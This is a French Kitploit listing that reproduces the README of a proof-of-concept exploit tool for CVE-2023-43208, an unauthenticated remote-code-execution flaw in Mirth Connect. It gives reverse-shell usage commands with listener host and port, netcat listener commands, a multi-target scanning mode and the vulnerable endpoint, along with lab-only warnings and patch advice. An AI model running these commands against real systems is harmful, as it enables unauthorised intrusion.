Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PoC-2023-43208 — Un exploit de preuve de concept pour CVE-2023-43208, une vulnérabilité d'exécution de code à distance dans Mirth Connect avant la version 4.4.1. | Kitploit
Outils/GitHubGitHub/mkirahmet/poc-2023-43208
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubmkirahmet/poc-2023-43208

PoC-2023-43208

Un exploit de preuve de concept pour CVE-2023-43208, une vulnérabilité d'exécution de code à distance dans Mirth Connect avant la version 4.4.1.

Voir le dépôt
31il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-43208-EXPLOIT

Exploit d'exécution de code à distance (RCE) pour Mirth Connect

Python Version Version CVE Lab Use Only

⚠️ POUR USAGE ÉDUCATIF ET EN LABORATOIRE UNIQUEMENT ⚠️

Un exploit de preuve de concept pour CVE-2023-43208, une vulnérabilité d'exécution de code à distance dans Mirth Connect avant la version 4.4.1.

🚨 AVERTISSEMENT JURIDIQUE IMPORTANT

Cet outil est strictement destiné à :

  • 🧪 Fins éducatives
  • 🔬 Tests de sécurité autorisés dans des environnements de laboratoire
  • 📚 Recherche et apprentissage en cybersécurité

NE PAS UTILISER :

  • ❌ Contre des systèmes qui ne vous appartiennent pas
  • ❌ Sans autorisation écrite explicite
  • ❌ Dans des environnements de production
  • ❌ À des fins illégales ou malveillantes
  • Vous êtes responsable du respect de toutes les lois et réglementations applicables. Une mauvaise utilisation de cet outil peut entraîner des poursuites pénales.

    📋 Description

    Cet exploit cible la vulnérabilité de désérialisation XML dans le point de terminaison /api/users de Mirth Connect, permettant une exécution de code à distance sans authentification sur les versions concernées (< 4.4.1).

    Il s'agit d'une vulnérabilité CRITIQUE et elle ne doit être testée QUE dans des environnements de laboratoire isolés avec vos propres systèmes.

    🔧 Prérequis

    • Python 3.7 ou supérieur
    • Paquets requis listés dans requirements.txt
    • UN ENVIRONNEMENT DE LABORATOIRE avec une instance Mirth Connect vulnérable

    🚀 Installation

    Clonez le dépôt

    git clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git cd CVE-2023-43208-EXPLOIT

    Installez les prérequis

    pip install -r requirements.txt 💻 Utilisation (LAB UNIQUEMENT) Mode interactif (recommandé en laboratoire) bash python exploit.py Mode ligne de commande bash

    Exploitation d'une cible unique (LAB UNIQUEMENT)

    python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444

    Analyse de plusieurs cibles à partir d'un fichier (LAB UNIQUEMENT)

    python exploit.py -f targets.txt -t 50 -o vulnerable.txt

    Mode non interactif (LAB UNIQUEMENT)

    python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive Options text -u, --url URL cible à exploiter (LAB UNIQUEMENT) -lh, --lhost Hôte d'écoute (votre IP) -lp, --lport Port d'écoute -f, --file Fichier contenant les URL cibles à analyser -o, --output Fichier de sortie pour enregistrer les résultats d'analyse -t, --threads Nombre de threads pour l'analyse (défaut : 50) --no-interactive Exécution en mode non interactif

    🎯 Exemple d'environnement de laboratoire

    Configurez votre laboratoire :

    Installez une version vulnérable de Mirth Connect (< 4.4.1) dans une VM isolée

    Utilisez un réseau contrôlé (ex. NAT/Host-only dans VirtualBox/VMware)

    Ne l'exposez jamais à Internet

    Démarrez votre listener :

    ncat -lnvp 4444

    ou

    nc -lnvp 4444

    Exécutez l'exploit dans votre laboratoire :

    python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444

    🧪 Exigences de l'environnement de test

    • Réseau/VLAN isolé
    • Machines virtuelles uniquement
    • Aucune donnée de production
    • Règles de pare-feu bloquant l'accès externe
    • Autorisation appropriée documentée

    📝 Détails techniques

    Type de vulnérabilité : RCE par désérialisation XML

    Versions concernées : Mirth Connect < 4.4.1

    Version corrigée : 4.4.1 et ultérieures

    Score CVSS : 9.8 (Critique)

    Vecteur d'attaque : Réseau

    Authentification : Aucune requise

    L'exploit utilise des gadgets Commons Collections pour parvenir à une RCE via le point de terminaison /api/users.

    🛡️ Mesures de protection

    Si vous utilisez Mirth Connect :

    • ✅ Mettez à jour vers la version 4.4.1 ou une version ultérieure
    • ✅ Restreignez l'accès réseau aux interfaces d'administration
    • ✅ Mettez en place une authentification appropriée
    • ✅ Surveillez les charges utiles XML suspectes

    👥 Crédits

    Auteurs originaux : K3ysTr0K3R & Chocapikk Modifié par : M0h4 CVE : CVE-2023-43208

    ⚠️ AVERTISSEMENT FINAL

    ╔══════════════════════════════════════════════════════════════╗ ║ CE LOGICIEL EST RÉSERVÉ AU LAB UNIQUEMENT ║ ║ Toute utilisation non autorisée est ILLÉGALE ║ ║ Vous assumez TOUS les risques et responsabilités ║ ║ L'auteur décline TOUTE responsabilité en cas d'abus ║ ╚══════════════════════════════════════════════════════════════╝

    Télécharger l’outil